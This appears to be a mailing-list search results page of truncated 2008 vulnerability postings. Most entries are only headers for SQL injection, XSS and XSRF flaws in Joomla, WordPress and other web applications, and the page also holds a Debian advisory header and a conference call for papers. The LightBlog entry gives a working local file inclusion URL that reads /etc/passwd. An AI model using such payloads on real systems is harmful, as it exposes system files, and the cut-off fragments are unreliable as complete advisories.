lightblog 9.6 local file inclusion vulnerability
download http://www.publicwarehouse.co.uk/php_scripts/lightblog.php
author muuratsalo
contactmuuratsalo[at]gmail.com
exploit
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00
###
#
# joomla SQL Injection(com_filebase)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MA#304;L : [EMAIL PROTECTED]
###
#
# joomla SQL Injection(com_galeria)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.milw0rm.com/author/1334
#
# MA#304;L : [EMAIL
###
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties by NBBN
###
[b]
1) Create Webmaster (admin) XSRF Vulnerability[/b]
htmlhead/headbody
Crafty Syntax Live Help is an open source help desk system built
mainly for small-mid sized companies. The software includes an xss
vulnerability on lostsheep.php module.
Versions effected: 2.4.13 - 2.4.14
--
Ozgur Ozdemircili
CCNA, HIPAA, OPSEC,
Open Source Security Systems
###
#
# joomla SQL Injection(com_profile)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MA#304;L : [EMAIL PROTECTED]
###
#
# joomla SQL Injection(com_detail)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MA#304;L : [EMAIL PROTECTED]
#
#
#
# Wordpress Plugin (wp-content/recipe) SQL Injection
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.hackturkiye.com/
#
#
# WordPress forumaction(PAGE_#304;D)(user)SQL Injection
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.hackturkiye.com/
#
###
#
# WordPress album PHOTO SQL Injection
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MA#304;L : [EMAIL PROTECTED]
RUXCON 2008 CALL FOR PAPERS
RuxCon would like to announce the call for papers for the fifth annual
RuxCon conference.
This year the conference will commence during the 29th/30th November.
As with previous years, RuxCon will be held at the University of
Technology, Sydney, Australia.
The
#
#
# WordPress SQL Injection(wp-content-simple-forum)
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.hackturkiye.com/
#
###
#
# joomla SQL Injection(com_jooget)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.milw0rm.com/author/1334
#
# MA#304;L : [EMAIL PROTECTED]
#!/usr/bin/perl
# Simple CMS = 1.0.3 (?area=) Remote SQL Injection Exploit
# Code by JosS | Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team / Sys - Project
# http://www.spanish-hackers.com
# special thanks to ka0x
print
==
ATutor = 1.5.5 Cross Site Scripting
==
Author: L4teral l4teral [4t] gmail com
Impact: Cross Site Scripting
Status: patch available
###
#
# joomla SQL Injection(com_ricette)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.milw0rm.com/author/1334
#
# MA#304;L : [EMAIL
==
ProjectPier = 0.80 Cross Site Scripting and Request Forgery
==
Author: L4teral l4teral [4t] gmail com
Impact: Cross Site Scripting
#
#
# joomla SQL Injection (cat)(com_downloads)
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.milw0rm.com/author/1334
#
#
#
#
# Wordpress Plugin (wp-people) SQL Injection
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.hackturkiye.com/
#
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA-1495-2 [EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
February 17, 2008
## ##
## ##
## ##
###CoRPITX
###
## ##
## ##
## ##
### Turkey
# #
For information on this threat, please visit
http://www.etomite.com/forums/index.php?showtopic=7647
The information posted by the finder is inaccurate.
After researching this threat it appears that this is not a direct issue with
Etomite itself but, rather, an exploit which server security lets through... I
have tested several different scripts on several servers and have found this to
be the case...
The variable is actually
23 matches
Mail list logo